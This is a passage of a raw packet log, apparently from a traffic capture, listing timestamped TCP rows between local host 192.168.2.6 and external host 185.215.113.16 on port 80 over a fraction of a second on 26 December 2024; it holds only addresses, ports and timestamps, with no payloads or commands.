Dec 26, 2024 12:41:43.424585104 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.424596071 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.424607038 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.424618006 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.424621105 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.424631119 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.424648046 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.424657106 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.424659967 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.424664974 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.424671888 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.424683094 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.424700975 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.424705029 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.424711943 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.424719095 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.424724102 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.424734116 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.424743891 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.424750090 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.424757004 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.424770117 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.424770117 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.424782038 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.424803019 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.424809933 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.424813986 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.424827099 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.424837112 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.424843073 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.424849987 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.424861908 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.424873114 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.424875975 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.424884081 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.424896002 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.424899101 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.424916029 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.473891973 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.485188007 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.544460058 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.544511080 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.604732037 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.604825020 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.604974985 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.605216026 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.605393887 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.605448961 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.606024027 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.606173992 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.606220007 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.606933117 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.607116938 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.607166052 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.607830048 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.607938051 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.607989073 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.608709097 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.608897924 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.608952999 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.609745026 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.609822035 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.609880924 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.610512972 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.610629082 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.610680103 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.611367941 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.611577034 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.611624002 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.612250090 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.612410069 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.612489939 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.613184929 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.613404989 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.614110947 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.614160061 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.614177942 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.614959002 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.615005016 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.615072012 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.615824938 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.615870953 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.616055965 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.616748095 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.616792917 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.616874933 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.617013931 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.617624044 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.617779016 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.617829084 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.618524075 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.618588924 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.618628979 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.619366884 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.619517088 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.619554996 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.620269060 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.620393038 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.620438099 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.621275902 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.621376038 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.622117043 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.622160912 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.622170925 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.622977018 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.623042107 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.623083115 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.623955011 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.623972893 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.623996973 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.624017954 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.624799967 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.624814034 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.625005007 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.625726938 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.625906944 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.625942945 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.626600981 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.626656055 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.626698971 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.627382040 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.627780914 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.627846003 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.628285885 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.628439903 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.628495932 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.629169941 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.629276037 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.630096912 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.630146027 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.630336046 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.630997896 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.631027937 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.631042957 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.631882906 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.631926060 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.632105112 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.632766008 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.632807970 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.632941961 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.633004904 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.633600950 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.633724928 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.633788109 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.634572983 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.634689093 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.634732008 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.635360003 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.635461092 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.635504007 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.636290073 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.636466980 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.636511087 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.637192965 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.637368917 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.638041019 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.638086081 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.638160944 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.638942957 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.638986111 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.639067888 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.639849901 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.640114069 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.640156984 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.640765905 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.640885115 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.640928030 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.641655922 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.641715050 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.642509937 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.642564058 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.642636061 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.643543005 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.643554926 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.643589973 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.643603086 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.644319057 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.644397020 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.645024061 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.645155907 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.645354986 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.645395041 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.646061897 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.646243095 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.646286011 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.647070885 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.647176981 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.647232056 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.647835016 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.648025990 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.648077965 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.648788929 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.648958921 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.649013996 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.649678946 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.649704933 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.649755955 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.650510073 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.650641918 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.650691986 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.651441097 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.651531935 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.651577950 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.652281046 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.652492046 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.652542114 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.653163910 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.653745890 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.654036045 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.654088020 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.654160023 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.654958010 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.655030966 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.655111074 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.655697107 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.655720949 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.655868053 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.656033993 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.656081915 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.656949997 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.656963110 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.657013893 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.657641888 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.657787085 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.657834053 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.658663988 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.658675909 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.658719063 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.659445047 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.659496069 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.659543991 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.660289049 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.660459042 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.660507917 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.661195993 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.661359072 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.661436081 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.662113905 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.662209034 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.662257910 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.662957907 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.663177013 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.663845062 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.663902044 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.664001942 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.664792061 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.664807081 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.664855003 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.665628910 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.665649891 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.666007042 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.666026115 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.666580915 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.666634083 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.666691065 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.667491913 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.667610884 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.667663097 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.667907953 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.668339968 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.668514967 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.668529987 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.669049025 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.669188976 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.669511080 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.669563055 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.670203924 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.670397997 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.670450926 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.671145916 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.671159029 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.671206951 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.671951056 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.671966076 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.672008991 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.672683954 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.673011065 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.673691988 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.673748016 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.673801899 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.674562931 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.674722910 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.674774885 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.675388098 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.675486088 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.675537109 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.676369905 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.676440954 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.676527023 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.677314043 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.677331924 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.677423954 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.678129911 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.678186893 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.678241014 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.678991079 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.679102898 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.679161072 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.680088043 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.680105925 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.680156946 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.680712938 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.680819988 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.680870056 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.681679964 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.681766987 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.682782888 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.682802916 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.682838917 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.682871103 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.683737993 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.683826923 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.684602022 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.684668064 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.684721947 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.685282946 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.685518980 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.686115026 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.686172962 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.686438084 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.687020063 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.687072039 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.687103987 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.687861919 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.687937021 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.688075066 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.688127041 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.688739061 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.688867092 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.688918114 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.689656973 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.689783096 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.690691948 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.690704107 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.690757990 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.691428900 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.691704035 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.691754103 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:43.692375898 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:43.692532063 CET	80	49784	185.215.113.16	192.168.2.6
